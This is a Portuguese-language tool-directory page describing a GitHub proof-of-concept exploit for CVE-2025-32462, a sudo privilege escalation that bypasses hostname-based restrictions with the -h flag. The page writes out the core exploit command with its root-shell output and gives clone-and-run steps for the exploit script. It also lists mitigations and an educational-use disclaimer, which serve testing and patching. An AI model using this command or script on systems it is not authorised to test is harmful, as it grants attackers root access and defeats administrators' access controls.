Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32462-Exploit — CVE-2025-32462 Exploit | Kitploit
Ferramentas/GitHubGitHub/cybersentinelx1/cve-2025-32462-exploit
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubcybersentinelx1/cve-2025-32462-exploit

CVE-2025-32462-Exploit

CVE-2025-32462 Exploit

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32462-Exploit: Matrix-Sudo Escape

Escalonamento de Privilégios por Spoofing de Hostname (CVE-2025-32462)

"Você toma a pílula azul... a história acaba. Você toma a pílula vermelha... você obtém root."

Descrição

Este exploit demonstra uma vulnerabilidade de escalonamento de privilégios no sudo (CVE-2025-32462) onde restrições baseadas em hostname podem ser contornadas usando a flag -h. O PoC cria um ambiente de usuário restrito e, em seguida, escapa dele ao falsificar um hostname na lista de permissões para obter acesso root.

root@kitploit:~
[user@matrix-node]$ sudo -h zion-core bash  # Falsifica hostname na lista de permissões
[root@matrix-node]# id                          # Conseguiu root no hostname errado!
uid=0(root) gid=0(root) groups=0(root)

Detalhes Técnicos

  • Versões do Sudo Vulneráveis: < 1.9.17
  • Vetor de Ataque: Escalonamento local de privilégios
  • Falha Chave: Bypass de verificação de hostname via parâmetro sudo -h
  • Impacto: Usuários restritos podem obter root em sistemas configurados incorretamente

Uso

Clonar repositório:

root@kitploit:~
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape

Tornar executável e executar:

root@kitploit:~
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh

Siga os prompts interativos para demonstrar:

  • Detecção da vulnerabilidade CVE-2025-32462
  • Criação de usuário
  • Configuração de restrição de hostname
  • Execução do exploit
  • Limpeza

Proteção

  • ✅ Atualize o sudo para v1.9.17+
  • ✅ Evite restrições de sudo baseadas em hostname
  • ✅ Use políticas de sudo baseadas em grupos

Legal

Apenas para fins educacionais/de pesquisa. Use apenas em sistemas próprios ou com permissão para testar.

Baixar ferramenta